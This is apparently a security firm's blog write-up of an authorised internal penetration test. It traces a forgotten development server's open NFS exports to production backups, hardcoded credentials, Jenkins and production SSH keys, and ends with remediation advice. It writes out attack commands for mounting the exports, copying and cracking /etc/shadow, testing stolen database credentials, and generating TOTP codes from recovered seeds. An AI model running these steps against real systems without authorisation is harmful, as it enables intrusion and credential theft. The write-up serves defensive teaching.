> root@dev-legacy:~# ls /backups/prod/ | wc -l && echo 'backup files found'
Every organisation has ghosts on its network. Servers that were built for a project that ended two years ago. Virtual machines spun up for a proof of concept that was never approved. Development environments created by a contractor who left the company before documenting what they had built. Test databases populated with production data because it was easier than generating synthetic records.
These systems accumulate like sediment. They are not in the asset register because they were never formally commissioned. They are not in the patching cycle because nobody knows they exist. They are not monitored because they were never enrolled in the SIEM. They are not backed up because they are not production systems. They are not decommissioned because nobody remembers they are there.
And then, one Tuesday afternoon, a penetration tester finds one. It is running an unpatched operating system, it is accessible from the user VLAN, and it contains a complete copy of the production database — customer names, addresses, financial records, and hashed passwords. All of them.
This is that story.
The client was an e-commerce company with a significant online presence — processing several million transactions per year across multiple brands. They operated a hybrid infrastructure: customer-facing applications hosted in a public cloud environment, with back-office systems, databases, and internal tooling running on-premises in a co-located data centre. The IT team comprised approximately forty people, including a dedicated development team of twelve.
We had been engaged to conduct an internal network penetration test focused on the on-premises environment. The scope covered all internal VLANs reachable from the user network, including server, development, and management segments. The client was particularly interested in the security of their database infrastructure, as they were preparing for a PCI DSS reassessment and wanted assurance that their cardholder data environment was properly isolated.
They provided us with a network diagram and an asset register. Both documents would prove to be incomplete.
Our initial scan of the internal network produced a host count that did not match the asset register. The register listed one hundred and forty-seven servers across all VLANs. Our scan identified one hundred and sixty-three. Sixteen unregistered hosts — a discrepancy of approximately eleven per cent.
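For context, the initial sweep needs nothing exotic. A pass along the lines below — with the subnet range and file names as placeholders rather than the client's addressing — is enough to produce a live-host count to set against the register.

```bash
# Illustrative host-discovery sweep; the subnet is a placeholder, not the
# client's addressing
nmap -sn 10.0.0.0/21 -oG - | awk '/Status: Up/{print $2}' | sort -u > live_hosts.txt

# The figure to set against the asset register
wc -l < live_hosts.txt
```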
Discrepancies between asset registers and reality are common on penetration tests. They typically represent a mix of temporary systems, forgotten test infrastructure, and devices added outside the change management process. But the scale of this discrepancy — sixteen hosts — suggested a more systemic issue.
We catalogued the unregistered hosts by VLAN.
Nine of the sixteen unregistered hosts were on the development VLAN. This VLAN was described in the client's documentation as a 'sandbox environment for application development and testing'. It was routable from the user VLAN — developers needed access to their test systems from their workstations. Firewall rules between the user VLAN and the development VLAN were permissive: all TCP and UDP ports were allowed in both directions.
The development VLAN was, in the client's own words, 'not production' and therefore subject to less rigorous controls. This distinction — between production and non-production — would prove to be the central weakness of the entire engagement.
We turned our attention to the development VLAN at 10.0.5.0/24, where thirty-one hosts were present: twenty-two registered and nine unregistered. The registered systems ran a mix of Linux and Windows, hosting development instances of the company's web applications, CI/CD pipeline tools, and staging databases.
The nine unregistered hosts presented a very different profile.
Seven of the nine unregistered hosts were running end-of-life operating systems — Ubuntu 16.04, Ubuntu 18.04, CentOS 7, and Windows Server 2012 R2. None were receiving security patches. All were running outdated application software. Several were running services with known critical vulnerabilities.
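Fingerprinting hosts like these is a routine step; something along the lines below — the input file and output prefix are illustrative — is how operating system and service versions would typically be confirmed.

```bash
# Service and OS fingerprinting of the unregistered hosts
# (-O requires root; input and output names are illustrative)
sudo nmap -sV -O -iL unregistered_hosts.txt -oA unregistered_fingerprint
```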
These were the ghosts. Development servers built for projects that had ended, proofs of concept that had served their purpose, and test environments that had been superseded by newer infrastructure. Nobody had decommissioned them because nobody owned them. They had been built by developers who had moved on, by contractors whose engagements had ended, and by IT staff who had changed roles. The machines ran on, quietly consuming IP addresses and electricity, invisible to every management process the organisation operated.
We examined each of the unregistered hosts systematically, but one device commanded our attention more than the others: 10.0.5.208 — an Ubuntu 18.04 server running MySQL 5.7, SSH, and NFS.
The NFS service was the immediate point of interest. NFS (Network File System) is a protocol for sharing filesystems across a network. When misconfigured — particularly when exports are shared with overly broad access permissions — NFS can expose sensitive data to any host on the network.
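Checking whether a host is offering exports — and mounting one for inspection — takes two standard commands. The sketch below shows the general approach rather than a transcript of the engagement; the mount point is arbitrary.

```bash
# List the exports advertised by the host (showmount ships with nfs-common)
showmount -e 10.0.5.208

# Mount an export read-only for inspection; the mount point is arbitrary
sudo mkdir -p /mnt/nfs-review
sudo mount -t nfs -o ro,nolock 10.0.5.208:/backups /mnt/nfs-review
ls -lh /mnt/nfs-review
```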
Two NFS exports, both shared with everyone — no IP-based access restrictions, no authentication, no encryption. We mounted the /backups share and discovered a directory structure that immediately raised the severity of the finding.
A directory named prod. On a development server. In an unregistered, unmanaged, unmonitored system.
Forty-three gigabytes of production database backups. Monthly exports of the e-commerce database, the CRM system, the user authentication database, and the analytics data warehouse. The files spanned six months, from August 2023 to February 2024. A cron job script on the server revealed the origin: a developer named D. Kumar had created an automated process that connected to the production database server each month, performed a full export, and stored the result on this development server.
The purpose, as noted in the script's comments, was a 'dev data refresh' — populating the development environment with realistic data for testing. This is an extremely common practice in software development. It is also one of the most dangerous, because it places production data — with all its sensitivity, all its regulatory obligations, and all its commercial value — on infrastructure that was never designed to protect it.
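We are not reproducing the client's script here, but a typical 'dev data refresh' job looks much like the sketch below. Every hostname, credential, and path in it is invented for illustration.

```bash
#!/bin/bash
# Hypothetical reconstruction of a 'dev data refresh' job -- not the client's
# script. Hostnames, credentials, and paths are invented for illustration.
# Typical crontab entry: 0 2 1 * * /opt/scripts/dev_data_refresh.sh

BACKUP_DIR=/backups/prod
STAMP=$(date +%Y-%m)

# A full export pulled straight from the production database server, with the
# password embedded in the script itself -- the heart of the problem.
mysqldump -h prod-db01.internal -u backup_svc -p'EXAMPLE_ONLY_PASSWORD' \
    --single-transaction ecommerce_db \
    | gzip > "$BACKUP_DIR/ecommerce_db_${STAMP}.sql.gz"
```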
An unregistered, unpatched development server contained 43.8 GB of production database backups including customer PII, financial transaction records, authentication credentials, and CRM data. The data was accessible without authentication via NFS exports shared with all hosts on the network.
We decompressed and examined the most recent backup of each database — not to exfiltrate or copy the data, but to characterise its contents and sensitivity for accurate reporting. The scope of our access was confirmed through selective examination of table structures and limited record sampling.
| Database | Size | Contents | Sensitivity |
|---|---|---|---|
| ecommerce_db | 4.7 GB | Customer orders, delivery addresses, transaction history, product catalogue, pricing | PII, commercial — PCI DSS scope if card data present |
| crm_full | 1.9 GB | Customer contact records, support tickets, account notes, communication preferences | PII — GDPR Article 5 obligations apply |
| user_auth_db | 890 MB | Usernames, email addresses, bcrypt password hashes, MFA seeds, session tokens, API keys | Authentication credentials — critical security impact |
| analytics_warehouse | 12 GB | Aggregated transaction data, customer segmentation, marketing analytics, revenue reporting | Commercial — competitive intelligence value |
The user_auth_db backup was the most immediately dangerous. It contained bcrypt-hashed passwords for every customer account on the platform — over two million records. Bcrypt is a strong hashing algorithm, and the hashes would resist bulk cracking. However, the database also contained MFA seeds — the shared secrets used to generate time-based one-time passwords for customers who had enabled two-factor authentication. With the password hash and the MFA seed, an attacker who cracked a customer's password would also be able to generate valid MFA codes, completely defeating the two-factor protection.
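To illustrate why the seeds matter: anyone holding the shared secret can generate exactly the same codes as the customer's authenticator app. The one-liner below assumes the seeds were stored base32-encoded (the format most authenticator apps use); the seed shown is a placeholder.

```bash
# Generate the current TOTP code from a recovered seed. The seed shown is a
# placeholder, and base32 encoding is an assumption about how the seeds were
# stored (it is the format most authenticator apps use).
oathtool --totp -b "JBSWY3DPEHPK3PXP"
```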
The database also contained active API keys for integrations with payment processors, logistics providers, and marketing platforms. These keys were stored alongside their associated service account credentials. Several of the API keys, when tested against the providers' public endpoints, were still valid.
The e-commerce database contained customer names, email addresses, delivery addresses, phone numbers, and full order histories. A sampling of the data confirmed that it did not contain primary account numbers (PANs) or full card data — the payment processing was handled by a third-party tokenisation service, and only token references were stored. This was a positive finding from a PCI DSS perspective, but the volume of PII remained a significant GDPR concern.
The NFS share had given us access to the backup data directly, but we also needed to assess the server itself as a potential pivot point. The SSH service on 10.0.5.208 was running on the default port. We examined the backup script for credentials.
Hardcoded plaintext credentials for three production database servers — the e-commerce database, the CRM database, and the authentication database. The credentials followed a predictable pattern: Bkup_[Service]_2023! — the kind of password that is generated once, pasted into a script, and never changed.
We tested these credentials against the production database servers. The backup_svc accounts were still active on all three servers. The passwords had not been rotated since creation. The accounts had SELECT permissions on all databases — sufficient to read every table, every row, and every column in the production environment.
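Verifying credentials like these does not require reading any data; an authentication attempt and a grants query are sufficient, roughly as below. The hostname and password are placeholders following the pattern we observed.

```bash
# Confirm the account authenticates and enumerate its privileges without
# touching any table data (hostname and password are placeholders following
# the pattern we observed)
mysql -h prod-db01.internal -u backup_svc -p'Bkup_Ecom_2023!' \
      -e "SELECT CURRENT_USER(); SHOW GRANTS FOR CURRENT_USER();"
```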
The forgotten development server had not only stored a copy of the crown jewels — it had stored the keys to the vault as well.
The server's own accounts were the next step. Its /etc/shadow file turned out to be readable over NFS: the exports had been configured with the no_root_squash option, so a remote client connecting as root was treated as root on the exported filesystem rather than being mapped to an unprivileged user, and the exported tree reached far enough to include /etc/shadow.
We retrieved the shadow file, loaded the hashes into an offline cracker, and recovered the password for the d.kumar account: Summer2023!.
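The misconfiguration, and what exploiting it looks like in practice, can be sketched as follows. The export lines, the wordlist, and the assumption that the export reached the filesystem root are all illustrative.

```bash
# Illustrative /etc/exports entries. The dangerous pattern: exported to the
# world, root not squashed.
#   /backups    *(rw,sync,no_root_squash,no_subtree_check)
# A hardened equivalent: named clients only, root squashed, read-only.
#   /backups    10.0.5.10(ro,sync,root_squash,no_subtree_check)

# From the client side, no_root_squash means a local root user is root on the
# export. Mounting and copying the shadow file (assumes the export reached the
# filesystem root; paths and wordlist are illustrative):
sudo mkdir -p /mnt/ghost
sudo mount -t nfs -o ro,nolock 10.0.5.208:/ /mnt/ghost
sudo cp /mnt/ghost/etc/shadow ./shadow.copy

# Offline cracking of the recovered hashes (John the Ripper shown as one option)
john --wordlist=rockyou.txt shadow.copy
```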
D. Kumar was a developer who had left the company four months prior. His Active Directory account had been disabled as part of the standard leaver process. However, his local Linux account on the development server remained active — because the server was not in the asset register, it was not included in the leaver process, and nobody knew it existed.
We tested the cracked password against other services. Password reuse delivered the expected result: D. Kumar had used the same password for his local Linux account, his GitLab CE account on 10.0.5.207, and — critically — his Jenkins account on 10.0.5.203.
Jenkins on 10.0.5.203 was running version 2.249 — over three years behind the current release, with multiple known critical vulnerabilities. D. Kumar's account had administrative access. Jenkins' credential store contained stored SSH keys and passwords used by the CI/CD pipeline to deploy code to staging and production servers. Among these was an SSH private key for a service account with sudo access on production web servers.
From a forgotten development server to production infrastructure access. The credentials had been sitting in Jenkins for over a year, waiting for someone to find them.
| Step | Action | Weakness Exploited |
|---|---|---|
| 01 | Identified 16 unregistered hosts across internal VLANs | Incomplete asset register; no automated discovery |
| 02 | Enumerated 9 unmanaged servers on development VLAN | Development VLAN treated as low-risk; permissive firewall rules |
| 03 | Mounted NFS exports from 10.0.5.208 — no authentication | NFS exports shared with everyone; no IP restrictions |
| 04 | Discovered 43.8 GB of production database backups | Production data copied to unmanaged dev server for testing |
| 05 | Extracted production database credentials from backup script | Hardcoded plaintext credentials in shell script on NFS share |
| 06 | Confirmed credentials still valid on production database servers | No password rotation; service accounts unchanged since creation |
| 07 | Extracted /etc/shadow via NFS no_root_squash; cracked d.kumar | NFS misconfiguration; weak password; departed employee account active |
| 08 | Password reuse to Jenkins; extracted SSH keys for production servers | Password reuse; Jenkins credential store with production deployment keys |
This engagement exposed two interconnected problems that are endemic in organisations with active development teams: shadow infrastructure and the proliferation of production data into non-production environments.
The client's production database servers were well-managed. They were patched, monitored, backed up, and protected by network segmentation and access controls. The PCI DSS cardholder data environment was properly isolated. If the engagement had been scoped only to production systems, the findings would have been minimal.
But the copy of the production data on the development server was subject to none of these controls. The NFS share had no authentication. The server had no patches. The backup script had plaintext credentials. And the data — customer records, authentication hashes, API keys — was identical to what resided in the protected production environment.
Protecting the production database is necessary. It is not sufficient if a complete copy exists on an unmanaged server accessible from the entire network.
The most urgent action was isolating the unregistered servers and destroying the production data. The backup files on 10.0.5.208 constituted a data breach waiting to happen — two million customer records, accessible without authentication, on an unpatched server reachable from the user network.
Data masking and anonymisation must replace production data copies for development use. Tools and frameworks exist that can generate realistic test data from production schemas without exposing actual customer records. Where production data must be used in testing — for example, to reproduce specific bugs — it should be accessed in a controlled, time-limited, audited manner within a hardened staging environment, not copied to unmanaged servers via cron jobs.
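As a minimal sketch of what a masked refresh can look like — table and column names are invented, and a dedicated masking tool would handle referential integrity and realistic value generation far better than this — a development copy can be built with synthetic contact details:

```bash
# Minimal masking sketch run against a staging copy. Table and column names
# are invented; dedicated masking tools do this far more thoroughly.
mysql -h staging-db.internal -u masking_job -p"$MASKING_DB_PASSWORD" ecommerce_dev <<'SQL'
CREATE TABLE customers_masked AS
SELECT id,
       CONCAT('customer_', id)             AS name,
       CONCAT('user', id, '@example.test') AS email,
       'REDACTED'                          AS delivery_address,
       created_at
FROM customers;
SQL
```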
Secrets management platforms such as HashiCorp Vault eliminate the need for hardcoded credentials in scripts and CI/CD configurations. Credentials are retrieved at runtime from a centralised vault, with short-lived leases and automatic rotation. This removes the risk of plaintext credentials persisting on filesystems indefinitely.
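A backup or deployment job wired into a secrets manager retrieves its credential at runtime rather than embedding it. A minimal sketch using Vault's KV store, where the address, path, and field names are assumptions:

```bash
# Fetch the database credential from Vault at runtime; nothing sensitive is
# written into the script or left on disk. Address, path, and field names are
# illustrative.
export VAULT_ADDR=https://vault.internal:8200
DB_PASS=$(vault kv get -field=password secret/backup/ecommerce_db)
mysql -h prod-db01.internal -u backup_svc -p"$DB_PASS" -e 'SELECT 1;'
```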
The leaver process must be extended beyond Active Directory. When an employee departs, their access must be revoked across all systems — including local Linux accounts, CI/CD platforms, source code repositories, cloud consoles, and any other system where they hold credentials. This requires a comprehensive access register that goes beyond the corporate directory, which in turn requires that those systems are known and documented.
Finally, automated asset discovery must run continuously. A weekly network scan that compares live hosts against the asset register and alerts on discrepancies would have identified these servers within days of their creation. The technology is straightforward — the challenge is operational: ensuring that alerts are investigated, unregistered hosts are assessed, and ghost infrastructure is either formally adopted or decommissioned.
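A minimal version of that weekly check — file locations, the scanned range, and the alert recipient are all assumptions — might look like this:

```bash
#!/usr/bin/env bash
# Hypothetical weekly discovery check: diff live hosts against the asset
# register and alert on anything unregistered. Paths, range, and recipient
# are assumptions.
# Example crontab entry: 0 6 * * 1 /usr/local/bin/asset-discovery-check.sh
set -euo pipefail

nmap -sn 10.0.0.0/21 -oG - | awk '/Status: Up/{print $2}' | sort -u > /var/lib/discovery/live.txt
sort -u /var/lib/discovery/register.txt > /var/lib/discovery/register.sorted

# Addresses that respond on the network but do not appear in the register
unregistered=$(comm -23 /var/lib/discovery/live.txt /var/lib/discovery/register.sorted)

if [ -n "$unregistered" ]; then
    printf 'Unregistered hosts detected:\n%s\n' "$unregistered" \
        | mail -s 'Asset discovery discrepancy' infra-team@example.com
fi
```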
The client's production environment was well-defended. Their databases were patched, monitored, and access-controlled. Their PCI DSS controls were effective. Their GDPR compliance programme was active and resourced. On paper, the data was protected.
But a copy of that data — every customer record, every password hash, every API key — sat on an unmanaged server in a forgotten corner of the development VLAN, accessible to anyone who could mount an NFS share. The data did not care that the server was labelled 'development'. The data was real. The exposure was real. The regulatory consequences, had this been discovered by an attacker rather than a penetration tester, would have been very real indeed.
Asset management is not an exciting topic. It does not make headlines. It does not feature in conference keynotes. But it is the foundation upon which every other security control depends. You cannot patch a server you do not know exists. You cannot monitor a system that is not in your SIEM. You cannot protect data that has been copied to a place you have never looked.
Until next time — stay sharp, stay curious, and count your servers. Then count them again.
This article describes a penetration test conducted under formal engagement with full written authorisation from the client. All identifying details have been altered or omitted to preserve client confidentiality. No customer data was exfiltrated or copied from the environment. Data sensitivity was assessed through schema analysis and limited record sampling only. Unauthorised access to computer systems is a criminal offence under the Computer Misuse Act 1990 and equivalent legislation worldwide. Do not attempt to replicate these techniques without proper authorisation.
Hedgehog Security finds the servers your asset register missed — the ghost infrastructure, the forgotten development environments, and the production data that has migrated to places it should never be. If your development environment has not been assessed alongside your production systems, you are only seeing half the picture.